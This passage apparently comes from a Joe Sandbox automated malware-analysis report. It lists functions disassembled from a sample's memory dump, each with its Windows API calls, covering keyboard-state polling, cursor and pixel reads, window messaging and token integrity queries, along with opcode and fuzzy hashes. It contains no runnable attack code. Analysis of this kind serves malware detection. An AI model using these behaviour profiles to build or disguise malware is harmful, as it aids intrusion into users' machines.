                                                  • Instruction ID: 5c525d7f5fdf87b83efc60078fba4fa42cac88d5720435d14f6900e11a961af6
                                                  • Opcode Fuzzy Hash: 5a6f98391eca9ceaf72c29b62a218abf85a86e7be4ec21cc68d50396907a7741
                                                  • Instruction Fuzzy Hash: F4513A35A00109DFCB04EF64C981AAEBBF5EF09350B1480A9E919AB362CB31EE55DF50
                                                  Function 00C7A056 Relevance: 7.6, APIs: 5, Instructions: 130COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 53687032332245feb81a2c73abdc64c7dde011b0f990fb7c73f9ff408550a0cd
                                                  • Instruction ID: ab85c6aa5197697ec2ae655fe2fc33f6ccd7086581bc3eaa902b4ecd7b3d86b6
                                                  • Opcode Fuzzy Hash: 53687032332245feb81a2c73abdc64c7dde011b0f990fb7c73f9ff408550a0cd
                                                  • Instruction Fuzzy Hash: 7941E635904104EFE714DF38CC89FADBBA8EB89311F548665F92EA72E1C730AE41DA51
                                                  Function 00BF2344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetCursorPos.USER32(?), ref: 00BF2357
                                                  • ScreenToClient.USER32(00CB57B0,?), ref: 00BF2374
                                                  • GetAsyncKeyState.USER32(00000001), ref: 00BF2399
                                                  • GetAsyncKeyState.USER32(00000002), ref: 00BF23A7
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: AsyncState$ClientCursorScreen
                                                  • String ID:
                                                  • API String ID: 4210589936-0
                                                  • Opcode ID: b23d2787cd74a0cf19ecf4609fa29db86adca69bd4149fcd25c6e99022c4ce7a
                                                  • Instruction ID: 180522482f1b9a2c601082b81865eb5f0bbef024d20a1df6b4c6d712d92c726c
                                                  • Opcode Fuzzy Hash: b23d2787cd74a0cf19ecf4609fa29db86adca69bd4149fcd25c6e99022c4ce7a
                                                  • Instruction Fuzzy Hash: C5417F75604119FFDF159F68C884AEDBBB4FB05360F20435AF929932A0CB34AD94DBA1
                                                  Function 00C463AA Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C463E7
                                                  • TranslateAcceleratorW.USER32(?,?,?), ref: 00C46433
                                                  • TranslateMessage.USER32(?), ref: 00C4645C
                                                  • DispatchMessageW.USER32(?), ref: 00C46466
                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C46475
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                  • String ID:
                                                  • API String ID: 2108273632-0
                                                  • Opcode ID: b1e2adf988976e2d389cf62cb10ea295cab3bc0dc653f039e6cc931059c65561
                                                  • Instruction ID: 4c5cad1409a42a6788f615f828fa44622e9f6e05be92c56ca387df0548d285e8
                                                  • Opcode Fuzzy Hash: b1e2adf988976e2d389cf62cb10ea295cab3bc0dc653f039e6cc931059c65561
                                                  • Instruction Fuzzy Hash: 5131D471A40646AFDF64CFB4CC84BBA7BECBB02304F141269E435C31A4E7359989DB62
                                                  Function 00C48A1F Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetWindowRect.USER32(?,?), ref: 00C48A30
                                                  • PostMessageW.USER32(?,00000201,00000001), ref: 00C48ADA
                                                  • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00C48AE2
                                                  • PostMessageW.USER32(?,00000202,00000000), ref: 00C48AF0
                                                  • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00C48AF8
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: MessagePostSleep$RectWindow
                                                  • String ID:
                                                  • API String ID: 3382505437-0
                                                  • Opcode ID: 82445d6503a9cf1c0541a319cb46b2f9d52ae49678b73efa8d228098e3fc9608
                                                  • Instruction ID: 08167cbd7e8d9f964712ad46a088d8335a309ccc673fe3c64ae43dfd248284c9
                                                  • Opcode Fuzzy Hash: 82445d6503a9cf1c0541a319cb46b2f9d52ae49678b73efa8d228098e3fc9608
                                                  • Instruction Fuzzy Hash: 2831B171500219EBDB14CF68DD8CB9E3BB5FB04325F104229F925E61D0C7B09A58EB90
                                                  Function 00C4B1EC Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • IsWindowVisible.USER32(?), ref: 00C4B204
                                                  • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00C4B221
                                                  • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00C4B259
                                                  • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00C4B27F
                                                  • _wcsstr.LIBCMT ref: 00C4B289
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                  • String ID:
                                                  • API String ID: 3902887630-0
                                                  • Opcode ID: 169a9c6fd9678b205189863a38e3198c335efcb61588b2a4e4461b915c2ba78f
                                                  • Instruction ID: 68f968af5b73ca38cb213c0278bbcfdb34306122330d08807adf748f9a07eba1
                                                  • Opcode Fuzzy Hash: 169a9c6fd9678b205189863a38e3198c335efcb61588b2a4e4461b915c2ba78f
                                                  • Instruction Fuzzy Hash: 9921F5312042047BEB259B769C49F7F7BA8EF4A720F10412DF809DA161EBA1DD91A260
                                                  Function 00C7B14B Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00BF2612: GetWindowLongW.USER32(?,000000EB), ref: 00BF2623
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00C7B192
                                                  • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00C7B1B7
                                                  • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00C7B1CF
                                                  • GetSystemMetrics.USER32(00000004), ref: 00C7B1F8
                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00C60E90,00000000), ref: 00C7B216
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Window$Long$MetricsSystem
                                                  • String ID:
                                                  • API String ID: 2294984445-0
                                                  • Opcode ID: 6ecfe31261a6c44521c70094a6381eec487b3f475acc04554086fda1e8cab374
                                                  • Instruction ID: ec4a5ad0f59c3bc7c1c275b13958cd54a19b3b7453cfc27356eff0c633c22d2c
                                                  • Opcode Fuzzy Hash: 6ecfe31261a6c44521c70094a6381eec487b3f475acc04554086fda1e8cab374
                                                  • Instruction Fuzzy Hash: B1218B71A10655AFCB109F39DC54B6E3BA4FB05361F218728F93AD71E0E7309D618B90
                                                  Function 00C49307 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00C49320
                                                    • Part of subcall function 00BF7BCC: _memmove.LIBCMT ref: 00BF7C06
                                                  • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00C49352
                                                  • __itow.LIBCMT ref: 00C4936A
                                                  • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00C49392
                                                  • __itow.LIBCMT ref: 00C493A3
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$__itow$_memmove
                                                  • String ID:
                                                  • API String ID: 2983881199-0
                                                  • Opcode ID: 4ba3fcb3900d38161bf3308a0744f01e50c32ebd7cd60c301daca986685302b9
                                                  • Instruction ID: 0daa426183183ea61d0fa4e5e8171c35b840fba1c536de09c5c710880b85e46f
                                                  • Opcode Fuzzy Hash: 4ba3fcb3900d38161bf3308a0744f01e50c32ebd7cd60c301daca986685302b9
                                                  • Instruction Fuzzy Hash: 4821D731740218ABEB109E658C89EEF7BA9FB4A710F044069FA05D71E1DAB0CE459791
                                                  Function 00C65A4D Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • IsWindow.USER32(00000000), ref: 00C65A6E
                                                  • GetForegroundWindow.USER32 ref: 00C65A85
                                                  • GetDC.USER32(00000000), ref: 00C65AC1
                                                  • GetPixel.GDI32(00000000,?,00000003), ref: 00C65ACD
                                                  • ReleaseDC.USER32(00000000,00000003), ref: 00C65B08
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Window$ForegroundPixelRelease
                                                  • String ID:
                                                  • API String ID: 4156661090-0
                                                  • Opcode ID: 6f19181e713c9e067bd97aa7c33c06b8c505830d5888574dad2085a6a781cef7
                                                  • Instruction ID: 255af3c9c2624e3b7fca350e1ba08059ec057627ffa48cd45cf4822e9c49fe01
                                                  • Opcode Fuzzy Hash: 6f19181e713c9e067bd97aa7c33c06b8c505830d5888574dad2085a6a781cef7
                                                  • Instruction Fuzzy Hash: 6B219F35A00104AFD714EFA5DCC8BAEBBE5EF48350F148079F90A97362CA30AD45DB90
                                                  Function 00BF12F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00BF134D
                                                  • SelectObject.GDI32(?,00000000), ref: 00BF135C
                                                  • BeginPath.GDI32(?), ref: 00BF1373
                                                  • SelectObject.GDI32(?,00000000), ref: 00BF139C
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: ObjectSelect$BeginCreatePath
                                                  • String ID:
                                                  • API String ID: 3225163088-0
                                                  • Opcode ID: ebc51974f3004f6c200f5038dd1d60256a6fc98e67579324f796fa65f7a333e2
                                                  • Instruction ID: 175ec82e18622a704c563ce31f0d21f743028d62a3386a7b21febcbde329f103
                                                  • Opcode Fuzzy Hash: ebc51974f3004f6c200f5038dd1d60256a6fc98e67579324f796fa65f7a333e2
                                                  • Instruction Fuzzy Hash: 31214831840608EFDB119F29EC4476D7BE8FB10321F144B6AF918975E0D372999ADB94
                                                  Function 00C4BC9E Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: _memcmp
                                                  • String ID:
                                                  • API String ID: 2931989736-0
                                                  • Opcode ID: b270bd2ab038736aab9b8aab2eeaa3139c78e5dcd859ec479ed35413b48d39e8
                                                  • Instruction ID: 6e2131a0eaad366230c16abaadc3b1b7ad97fbdac105e6fcf356c24d79e89ea2
                                                  • Opcode Fuzzy Hash: b270bd2ab038736aab9b8aab2eeaa3139c78e5dcd859ec479ed35413b48d39e8
                                                  • Instruction Fuzzy Hash: C201B5716001057BE2046A165DC2FFBB76CEE1178CF084025FE1596246EB54EE21A2A4
                                                  Function 00C54A93 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetCurrentThreadId.KERNEL32 ref: 00C54ABA
                                                  • __beginthreadex.LIBCMT ref: 00C54AD8
                                                  • MessageBoxW.USER32(?,?,?,?), ref: 00C54AED
                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00C54B03
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00C54B0A
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                  • String ID:
                                                  • API String ID: 3824534824-0
                                                  • Opcode ID: 8b9a85b4b4e286da54f8530a2ba29a40b9ebc6a220e0473b1c3a09cb0f44268a
                                                  • Instruction ID: 3228634b3f44f0ab393aebf4ff3ebf13e34c431c2710e74193edad24348e9c93
                                                  • Opcode Fuzzy Hash: 8b9a85b4b4e286da54f8530a2ba29a40b9ebc6a220e0473b1c3a09cb0f44268a
                                                  • Instruction Fuzzy Hash: 7511E17AD09609BBC7058BA8AC48B9E7BACAB45325F144369FC28D3250D671898487A1
                                                  Function 00C48202 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C4821E
                                                  • GetLastError.KERNEL32(?,00C47CE2,?,?,?), ref: 00C48228
                                                  • GetProcessHeap.KERNEL32(00000008,?,?,00C47CE2,?,?,?), ref: 00C48237
                                                  • HeapAlloc.KERNEL32(00000000,?,00C47CE2,?,?,?), ref: 00C4823E
                                                  • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00C48255
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                  • String ID:
                                                  • API String ID: 842720411-0
                                                  • Opcode ID: e4321fe4462b03da68bf691e9c24a87912c28cc0f40c123ec593b281f28d66ce
                                                  • Instruction ID: 22c43bce533a80cf2f168331fe34231982c4f94ec8fabaf4be0f836849260b06
                                                  • Opcode Fuzzy Hash: e4321fe4462b03da68bf691e9c24a87912c28cc0f40c123ec593b281f28d66ce
                                                  • Instruction Fuzzy Hash: 08016971204204BFDB204FA6DC88E6F7BACFF8A764B50042DF859D2260DA718D45CA70
                                                  Function 00C4710A Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C47044,80070057,?,?,?,00C47455), ref: 00C47127
                                                  • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C47044,80070057,?,?), ref: 00C47142
                                                  • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C47044,80070057,?,?), ref: 00C47150
                                                  • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C47044,80070057,?), ref: 00C47160
                                                  • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C47044,80070057,?,?), ref: 00C4716C
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: From$Prog$FreeStringTasklstrcmpi
                                                  • String ID:
                                                  • API String ID: 3897988419-0
                                                  • Opcode ID: 93d28da85016d6502d4225f7d9240dc23966287239d41a49ad2d29e0a5f1fde6
                                                  • Instruction ID: 4e4696682438cbabe6578bfdd5e168682ecce4d9e6135e410d6f11368638dd99
                                                  • Opcode Fuzzy Hash: 93d28da85016d6502d4225f7d9240dc23966287239d41a49ad2d29e0a5f1fde6
                                                  • Instruction Fuzzy Hash: 88017C72A05204ABDB114F64DC88BAE7BADFF457A1F144268FD0DD2220D771DE819BA0
                                                  Function 00C55244 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C55260
                                                  • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00C5526E
                                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C55276
                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00C55280
                                                  • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C552BC
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: PerformanceQuery$CounterSleep$Frequency
                                                  • String ID:
                                                  • API String ID: 2833360925-0
                                                  • Opcode ID: cccc02f314efddb434537583ad188033428fd3ad8d1ee45152ef25353af9be4e
                                                  • Instruction ID: 5e941802a38dfba82c9ff7ff731e4f4408be90f24add31587e51075fde79e996
                                                  • Opcode Fuzzy Hash: cccc02f314efddb434537583ad188033428fd3ad8d1ee45152ef25353af9be4e
                                                  • Instruction Fuzzy Hash: E1015735D01A29DBCF00EFE4EC98AEDBB78BB08322F40005AE945F2150CB305599CBA9
                                                  Function 00C4810A Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00C48121
                                                  • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00C4812B
                                                  • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C4813A
                                                  • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00C48141
                                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C48157
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: HeapInformationToken$AllocErrorLastProcess
                                                  • String ID:
                                                  • API String ID: 44706859-0
                                                  • Opcode ID: 1cf1c779b7d586ac93f63b0a920b4ad59b7d1d894432a7381a6ecbea0307df83
                                                  • Instruction ID: af0eccc00f43bf27941a7b111d32a258a51ca2921f374dba840c9febfe57b258
                                                  • Opcode Fuzzy Hash: 1cf1c779b7d586ac93f63b0a920b4ad59b7d1d894432a7381a6ecbea0307df83
